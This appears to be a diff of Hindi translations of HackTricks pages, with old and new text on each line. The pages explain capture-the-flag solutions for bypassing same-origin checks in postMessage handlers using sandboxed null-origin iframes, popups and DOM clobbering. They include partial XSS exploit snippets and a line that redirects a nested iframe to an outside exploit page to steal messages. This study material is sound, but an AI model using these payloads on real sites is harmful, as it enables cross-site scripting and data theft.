* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>
## SOP-1 में Iframes ## SOP-1 में Iframes
इस [**चुनौती**](https://github.com/terjanq/same-origin-xss) के द्वारा बनाई गई है जिसे [**NDevTK**](https://github.com/NDevTK) और [**Terjanq**](https://github.com/terjanq) ने बनाया है, आपको कोड में XSS का शोध करने की आवश्यकता होगी इस [**चुनौती**](https://github.com/terjanq/same-origin-xss) क [**NDevTK**](https://github.com/NDevTK) और [**Terjanq**](https://github.com/terjanq) द्वारा बनाई गई है, आपको कोड में XSS का शोध करना होगा
```javascript ```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786'; const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => { onmessage = e => {
@ -25,26 +25,26 @@ renderContainer.innerHTML = data.body;
} }
} }
``` ```
मुख्य समस्या यह है कि [**मुख्य पृष्ठ**](https://so-xss.terjanq.me) `data.body` को भेजने के लिए DomPurify का उपयोग करता है, इसलिए उस कोड को अपने खुद के html डेटा को भेजने के लिए आपको `e.origin !== window.origin` को **बापास** करना होगा। मुख्य समस्या यह है कि [**मुख्य पृष्ठ**](https://so-xss.terjanq.me) DomPurify का उपयोग करता है ताकि `data.body` भेज सके, इसलिए उस कोड को अपने खुद के html डेटा भेजने के लिए आपको `e.origin !== window.origin` को **बापास** करना होगा।
चलिए देखते हैं वे कौन सी समाधान सुझाते हैं चलिए देखते हैं उन्होंने कौन सा समाधान प्रस्तावित किया है
### SOP बापास 1 (e.origin === null) ### SOP बापास 1 (e.origin === null)
जब `//example.org` को एक **sandboxed iframe** में एम्बेड किया जाता है, तो पृष्ठ का **मूल** **`null`** होगा, अर्थात **`window.origin === null`** होगा। इसलिए, `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` के माध्यम से iframe को एम्बेड करके हम **`null` मूल** को **बाध्य** कर सकते हैं जब `//example.org` को **sandboxed iframe** में समाहित किया जाता है, तो पृष्ठ का **मूल** **`null`** होगा, अर्थात **`window.origin === null`** होगा। इसलिए, `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` के माध्यम से iframe समाहित करके हम **`null` मूल** को **बलपूर्वक कर सकते हैं**
यदि पृष्ठ **एम्बेड किया जा सकता** था तो आप उस सुरक्षा को इस तरीके से बाईपास कर सकते थे (कुकीज़ को `SameSite=None` पर सेट करने की भी आवश्यकता हो सकती है)। अगर पृष्ठ **embeddable** होता तो आप उस सुरक्षा को उस तरीके से बायपास कर सकते थे (कुकीज भी `SameSite=None` पर सेट करने की आवश्यकता हो सकती है)।
### SOP बापास 2 (window.origin === null) ### SOP बापास 2 (window.origin === null)
कम जाने जाने वाला तथ्य यह है कि जब **sandbox मान `allow-popups` सेट होता है** तो **खोले गए पॉपअप** को **सभी सैंडबॉक्स विशेषताएं अनुरोधित** करेंगी जब तक `allow-popups-to-escape-sandbox` सेट न हो।\ कम जाना जानकारी है कि जब **sandbox मान `allow-popups` सेट किया जाता है** तो **खुला popup** सभी **sandboxed गुण** को **वारिस्त** करेगा जब तक `allow-popups-to-escape-sandbox` सेट नहीं है।\
इसलिए, एक **null मूल** से **पॉपअप** खोलने से पॉपअप के अंदर का **`window.origin`** भी **`null`** हो जाएगा। इसलिए, **null मूल** से **popup** खोलने से **पॉपअप** के अंदर **`window.origin`** भी **`null`** हो जाएगा।
### चुनौती का समाधान ### चुनौती समाधान
इसलिए, इस चुनौती के लिए, कोई भी एक **iframe** बना सकता है, **पॉपअप** खोल सकता है जो विकल्पी XSS कोड हैंडलर (`/iframe.php`) के पृष्ठ पर, `window.origin === e.origin` क्योंकि दोनों `null` हैं, इसलिए XSS को उपयोग करने वाला एक payload भेजना संभव है इसलिए, इस चुनौती के लिए, कोई भी **iframe** बना सकता है, **पॉपअप खोल** सकता है वह पृष्ठ जिसमें वंलरेबल XSS कोड हैंडलर (`/iframe.php`) के लिए, क्योंकि `window.origin === e.origin` क्योंकि दोनों `null` हैं, इससे **XSS का शिकार होने वाला एक पेलोड भेजना संभव है**
वह **payload** उपयोगकर्ता को **पहचानकर्ता** प्राप्त करेगा और एक **XSS** को शीर्ष पृष्ठ (पॉपअप खोलने वाला पृष्ठ) को **वापस भेजेगा**, जो **विकल्पी** `/iframe.php` में **स्थान बदलेगा**। पहचानकर्ता जाना जाता है, इसलिए यह मायने नहीं रखता है कि शर्त `window.origin === e.origin` पूरी नहीं होती है (याद रखें, मूल है **iframe** का पॉपअप जिसका **मूल** **`null`** है) क्योंकि `data.identifier === identifier` होता है। फिर, **XSS फिर से ट्रिगर होगा**, इस बार सही मूल में। वह **पेलोड** उपयोगकर्ता को **पहचान** देगा और एक **XSS** को **वापस शीर्ष पृष्ठ** (पॉपअप खोलने वाला पृष्ठ) पर भेजेगा, **जिसे** **वह** **स्थान बदल देगा** **वंलरेबल** `/iframe.php` पर। क्योंकि पहचान जानी जाती है, इसे मायने नहीं रखता कि शर्त `window.origin === e.origin` पूरी नहीं होती है (ध्यान दें, मूल है **iframe** से **उत्पन्न** **`null`** मूल है) क्योंकि `data.identifier === identifier`। फिर, **XSS फिर से ट्रिगर होगा**, इस बार सही मूल में।
```html ```html
<body> <body>
<script> <script>
@ -83,10 +83,10 @@ document.body.appendChild(f);
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं PEASS या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।** * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके।
</details> </details>

View file

@ -1,32 +1,32 @@
# आईफ्रेम्स के साथ SOP को दौर करना - 2 # आईफ्रेम्स के साथ SOP को बाइपास करना - 2
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**. * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**।
</details> </details>
## SOP-2 में आईफ्रेम्स ## SOP-2 में आईफ्रेम्स
इस [**चुनौती**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc) के [**समाधान**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution) में, [**@Strellic\_**](https://twitter.com/Strellic\_) पिछले खंड की एक समान विधि का प्रस्ताव करते हैं। चलो इसे देखते हैं। इस [**चुनौती**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc) के [**समाधान**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc) में, [**@Strellic\_**](https://twitter.com/Strellic\_) पिछले खंड की एक समान विधि का प्रस्ताव देते हैं। चलिए इसे जांचते हैं।
इस चुनौती में हमें आक्रमक को इसे **दौर करना** होगा: इस चुनौती में हमें आक्रमक को यह **बाइपास** करने की आवश्यकता है:
```javascript ```javascript
if (e.source == window.calc.contentWindow && e.data.token == window.token) { if (e.source == window.calc.contentWindow && e.data.token == window.token) {
``` ```
यदि वह ऐसा करता है, तो वह HTML सामग्री के साथ एक **postmessage** भेज सकता है जो **`innerHTML`** के साथ पृष्ठ में लिखा जाएगा बिना स्वचालन के (**XSS**). अगर वह ऐसा करता है, तो वह **postmessage** भेज सकता है जिसमें HTML सामग्री होगी ज**`innerHTML`** के साथ पेज में लिखी जाएगी बिना सेनिटेशन के (**XSS**).
**पहली जांच** को अनदेखा करने का तरीका है **`window.calc.contentWindow`** को **`undefined`** और **`e.source`** को **`null`** बनाना: **पहली जाँच** को छलकरने का तरीका यह है कि **`window.calc.contentWindow`** को **`undefined`** और **`e.source`** को **`null`** बनाना है:
* **`window.calc.contentWindow`** वास्तव में **`document.getElementById("calc")`** है। आप **`document.getElementById`** को **`<img name=getElementById />`** के साथ अधिग्रहण कर सकते हैं (ध्यान दें कि Sanitizer API -[यहां](https://wicg.github.io/sanitizer-api/#dom-clobbering)- अपनी डिफ़ॉल्ट स्थिति में DOM clobbering हमलों से सुरक्षा करने के लिए विन्यासित नहीं है)। * **`window.calc.contentWindow`** वास्तव में **`document.getElementById("calc")`** है। आप **`document.getElementById`** को **`<img name=getElementById />`** के साथ ओवरराइड कर सकते हैं (ध्यान दें कि सैनिटाइजर एपीआई -[यहाँ](https://wicg.github.io/sanitizer-api/#dom-clobbering)- DOM clobbering हमलों के खिलाफ सुरक्षा के लिए डिफ़ॉल्ट स्थिति में कॉन्फ़िगर नहीं है)।
* इसलिए, आप **`document.getElementById("calc")`** को **`<img name=getElementById /><div id=calc></div>`** के साथ अधिग्रहण कर सकते हैं। फिर, **`window.calc`** **`undefined`** हो जाएगा। * इसलिए, आप **`document.getElementById("calc")`** को **`<img name=getElementById /><div id=calc></div>`** के साथ ओवरराइड कर सकते हैं। फिर, **`window.calc`** **`undefined`** हो जाएगा।
* अब, हमें **`e.source`** को **`undefined`** या **`null`** होना चाहिए (क्योंकि `==` का उपयोग `===` के बजाय किया जाता है, **`null == undefined`** **`True`** है)। इसे प्राप्त करना "आसान" है। यदि आप एक **iframe** बनाते हैं और उससे **postMessage** भेजते हैं और तत्काल **remove** करते हैं, तो **`e.origin`** **`null`** हो जाएगा। निम्नलिखित कोड की जाच करें * अब, हमें चाहिए कि **`e.source`** **`undefined`** या **`null`** हो (क्योंकि `==` का उपयोग `===` के बजाय किया जाता है, **`null == undefined`** **`True`** है)। इसे प्राप्त करना "आसान" है। यदि आप एक **iframe** बनाते हैं और उससे **postMessage** भेजते हैं और तुरं**remove** कर देते हैं, तो **`e.origin`** **`null`** हो जाएगा। निम्नलिखित कोड की जाच करें
```javascript ```javascript
let iframe = document.createElement('iframe'); let iframe = document.createElement('iframe');
document.body.appendChild(iframe); document.body.appendChild(iframe);
@ -35,12 +35,12 @@ await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`); iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null document.body.removeChild(iframe); //e.origin === null
``` ```
दूसरे चेक को टोकन के बारे में छल ने के लिए **`token`** के साथ मान `null` भेजकर और **`window.token`** को मान **`undefined`** करना होगा: दूसरी जांच को टोकन के बारे में छलकने के लिए **`token`** को मान `null` के साथ भेजकर और **`window.token`** को मान **`undefined`** करके किया जा सकता है:
* **`null`** मूल पृष्ठों में **`document.cookie`** का पहुंच करने पर त्रुटि होती है, इसलिए **`window.token`** का मान **`undefined`** हो जाएगा. * **`token`** को मान `null` के साथ postMessage के माध्यम से भेजना सरल है।
* **`null`** मूल पृष्ठों में **`document.cookie`** का पहुंच करने पर त्रुटि होती है, इसलिए **`window.token`** का मान **`undefined`** हो जाएगा. * **`window.token`** **`document.cookie`** का उपयोग करने वाले **`getCookie`** फ़ंक्शन को कॉल करना है। ध्यान दें कि **`null`** मूल स्थान पृष्ठों में **`document.cookie`** तक पहुंच किसी **त्रुटि** को ट्रिगर करेगा। इससे **`window.token`** का मान **`undefined`** हो जाएगा
[**@terjanq**](https://twitter.com/terjanq) द्वारा अंतिम समाधान [**यहां**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html) है: [**@terjanq**](https://twitter.com/terjanq) द्वारा अंतिम समाधान [**निम्नलिखित**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html) है:
```html ```html
<html> <html>
<body> <body>
@ -80,10 +80,10 @@ setTimeout(start, 1000);
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>

View file

@ -1,24 +1,24 @@
# पोस्टमैसेज संदेशों को चुराना और आईफ्रेम के स्थान को संशोधित करना # आईफ्रेम की स्थान परिवर्तित करके पोस्टमैसेज चुराना
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **हैकिंग ट्रिक्स साझा करें और PRs के माध्यम से [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में सबमिट करें।** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
## बच्चा आईफ्रेम क स्थानों को बदलना ## बच्चा आईफ्रेम क स्थानों को बदलना
[**इस व्राइटअप**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) के अनुसार, यदि आप एक वेबपेज को आईफ्रेम के रूप में शामिल कर सकते हैं जिसमें X-Frame-Header नहीं है और वह एक और आईफ्रेम को शामिल करता है, तो आप **उस बच्चा आईफ्रेम के स्थान को बदल सकते हैं**। [**इस व्राइटअप**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) के अनुसार, यदि आप एक वेबपेज को आईफ्रेम कर सकते हैं जिसमें X-फ्रेम-हेडर नहीं है और जिसमें एक और आईफ्रेम है, तो आप **उस बच्चा आईफ्रेम की स्थान को बदल सकते हैं**।
उदाहरण के लिए, यदि abc.com के पास efg.com आईफ्रेम है और abc.com के पास X-Frame हैडर नहीं है, तो मैं एविल.कॉम को ईविल.कॉम के संबंधित आईफ्रेम (बच्चा या माता-पिता) के स्थान को बदलकर इस्तेमाल करके ईविल.कॉम को क्रॉस ऑरिजिन बना सकता हूँ, **`frames.location`**। उदाहरण के लिए, यदि abc.com के पास efg.com के रूप में आईफ्रेम है और abc.com के पास X-फ्रेम हेडर नहीं है, तो मैं efg.com को evil.com पार-संस्करण में बदल सकता हूँ, **`frames.location`** का उपयोग करके
यह विशेष रूप से पोस्टमैसेज में उपयोगी है क्योंकि यदि कोई पेज संवेदनशील डेटा को एक **वाइल्डकार्ड** का उपयोग करके भेज रहा है जैसे `windowRef.postmessage("","*")`, तो संबंधित आईफ्रेम (बच्चा या माता-पिता) के स्थान को **हमलावर के नियंत्रण में स्थित स्थान** पर बदलकर उस डेटा को चुरा सकते हैं। यह विशेष रूप से **पोस्टमैसेज** में उपयुक्त है क्योंकि यदि कोई पृष्ठ संवेदनशील डेटा को एक **वाइल्डकार्ड** जैसे `windowRef.postmessage("","*")` का उपयोग करके भेज रहा है, तो संबंधित आईफ्रेम (बच्चा या माता) की स्थान को एक हमलावर नियंत्रित स्थान पर बदलकर उस डेटा को चुरा सकते हैं।
```html ```html
<html> <html>
<iframe src="https://docs.google.com/document/ID" /> <iframe src="https://docs.google.com/document/ID" />
@ -39,10 +39,10 @@ window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
